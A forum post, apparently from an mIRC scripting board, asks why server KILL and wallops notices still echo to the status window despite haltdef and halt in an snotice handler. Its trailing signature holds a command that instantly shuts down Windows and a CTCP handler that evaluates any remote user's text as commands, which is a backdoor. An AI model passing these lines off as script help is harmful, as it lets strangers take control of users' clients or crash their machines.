I have this script:

Code:
on *:snotice:*Notice -- Received KILL message for *:{
  if ($window(@Kills) == $null) window -nk0 @Kills
  aline -ph @Kills $+($chr(91),$time,$chr(93),$chr(32),$network,:) $10 killed $left($8,-1) for $11-
  haltdef
  halt
}


But the kill messages still show up in both the status window and the created @Kills window, how come?

As far as I can tell, I haven't overridden halt and haltdef with noop or anything weird like that.

I also have several on wallops and on snotice events as well, same thing is happening to them.. they go to status and the @window associated with it.

EDIT:: Yes, I'm using the latest mIRC

Last edited by Midori; 28/07/07 10:46 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}